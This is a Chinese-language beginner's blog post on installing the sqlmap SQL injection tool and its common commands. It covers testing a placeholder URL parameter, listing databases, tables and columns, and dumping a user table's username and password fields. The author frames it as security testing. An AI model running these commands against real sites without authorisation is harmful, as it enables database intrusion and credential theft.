SQLMap-----初识

前言

昨天收到一封来自客户网络中心发来的邮件，说是之前的一个项目存在sql注入漏洞，并附上了一张sqlmap检测结果的图片。记得第一次接触sql注入这些关于系统安全的问题还是从老师口中得知，当时也了解了一些解决办法。好吧，这次的主题是sqlmap。

Sqlmap介绍

Sqlmap是开源的自动化SQL注入工具，由Python编写的，可以用来做sql注入安全测试、或者当做网站入侵工具。

sqlmap安装

因为是py写的所以需要有py的运行环境， 首先咱前往py官网https://www.python.org/ 点击download栏目之后再选择Windows（因为我用的是Windows系统，这个根据个人实际情况选择）进入下载列表

之后选择最新的py2（为什么要选py2?没记错的话是因为这个sqlmap是基于py2版本写的，不支持py3的api）的版本进入下载详情

选择根据系统是64还是32位，选择一个下载方式，这里我选的是红圈处的链接点击下载，安装没什么需要注意的直接下一步下一步 但是

Install for all users、add python to environment variables 这两项勾上 

debugging symbols、debug binaries这两个不用勾选

之后点击install进行安装。之后进入sqlmap官网 http://sqlmap.org/ 选择最近版本安装即可。亦可访问github上面直接下载 https://github.com/sqlmapproject/sqlmap，下载的安装包解压出来就可以了。

怎么运行呢？win+r输入cmd打开 ，在黑窗体里进入到你刚刚解压的文件的根目录下 就可以输入sqlmap的命令行了。当然如果配置了sqlmap到系统环境变量就不需要这么麻烦，这个我有空再补充如何配置。

Sqlmap 常用命令

1. sqlmap.py -u "http://www.x.com/index?id=1"

判断参数是否存在注入可能，如果结果中有 “id” is Vulnerable  的信息描述表示存在注入   ，这时候可以把下方的命令语句附加上去了。

2.--dbs

列出所有的数据库

3.-D "Name" --tables

取得Name库中的所有表

4. -D "Name" -T "user" --columns

取得Name库中的user表

5.-D "Name" -T "user" -C "username,password" --dump

下载字段username，password的值，若询问是否破解md5加密，选择no即可

好吧就列这么多吧，差不多够用了，这个主要还是用来做sql注入安全测试用吧。